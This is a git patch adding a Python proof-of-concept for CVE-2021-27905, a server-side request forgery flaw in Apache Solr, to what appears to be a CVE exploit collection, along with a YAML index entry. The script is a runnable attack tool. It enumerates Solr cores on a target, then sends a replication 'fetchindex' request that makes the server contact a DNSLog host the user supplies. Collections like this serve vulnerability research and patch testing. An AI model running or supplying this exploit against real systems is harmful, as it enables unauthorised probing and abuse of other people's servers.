From cbfc4a84ad9e313c4be9bfa5dac7f4c0d06a9013 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E8=B4=BE=E8=90=A7=E5=AF=92?= <12581917+jia-xiaohan607@user.noreply.gitee.com> Date: Fri, 10 Mar 2023 07:34:00 +0000 Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0apache=20solr=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E5=A4=B9=E5=BD=92=E6=A1=A3?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 贾萧寒 <> --- cve/apache-solr/CVE-2021-27905.py | 82 +++++++++++++++++++++++++++++++ openkylin_list.yaml | 2 + 2 files changed, 84 insertions(+) create mode 100644 cve/apache-solr/CVE-2021-27905.py diff --git a/cve/apache-solr/CVE-2021-27905.py b/cve/apache-solr/CVE-2021-27905.py new file mode 100644 index 00000000..7f4a64d5 --- /dev/null +++ b/cve/apache-solr/CVE-2021-27905.py @@ -0,0 +1,82 @@ +# CVE-2021-27905 +# Apache solr ssrf + +import requests +import urllib3 +import json +import sys, getopt +urllib3.disable_warnings() + + + + +def title(): + print("[-------------------------------------------------------------]") + print("[-------------- Apache Solr SSRF漏洞 ---------------]") + print("[-------- CVE-2021-27905 ----------]") + print("[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]") + print("[-------- Author:Henry4E36 ------------]") + print("[-------------------------------------------------------------]") + +def commit(): + url = "" + try: + opt, agrs = getopt.getopt(sys.argv[1:], "hu:d:", ["help", "url=","dnslog="]) + for op, value in opt: + if op == "-h" or op == "--help": + print(""" + [-] Apache Solr SSRF漏洞 (CVE-2021-27905) + [-] Options: + -h or --help : 方法说明 + -u or --url : 站点URL地址 + -d or --dnslog : DnsLog + """) + sys.exit(0) + elif op == "-u" or op == "--url=": + url = value + elif op == "-d" or op == "--dnslog=": + dnslog = value + else: + print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog") + sys.exit() + return url, dnslog + + except Exception as e: + print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog") + sys.exit(0) + +def target_core(url): + target_url = url + "/solr/admin/cores?indexInfo=false&wt=json" + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" + } + try: + res = requests.get(url=target_url,headers=headers,verify=False,timeout=5) + core = list(json.loads(res.text)["status"])[0] + return core + except Exception as e: + print(f"[!] 目标系统: {url} 出现意外!\n ",e) + +def ssrf(core,dnslog): + target_url = url + f"/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}" + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" + } + try: + res = requests.get(url=target_url, headers=headers, verify=False, timeout=5) + status = json.loads(res.text)["status"] + if res.status_code == 200 and status == "OK": + print(f"[!] \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m") + else: + print(f"[0] 目标系统: {url} 不存在SSRF漏洞") + + except Exception as e: + print(f"[!] 目标系统: {url} 出现意外!\n ", e) + + +if __name__ == "__main__": + title() + url ,dnslog = commit() + core = target_core(url) + ssrf(core,dnslog) +\ No newline at end of file \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 880fd7cb..f822acc2 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -6,6 +6,8 @@ cve: - CVE-2021-42013 apache-APISIX: - CVE-2022-24112 + apache-solr: + - CVE-2021-27905 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 -- Gitee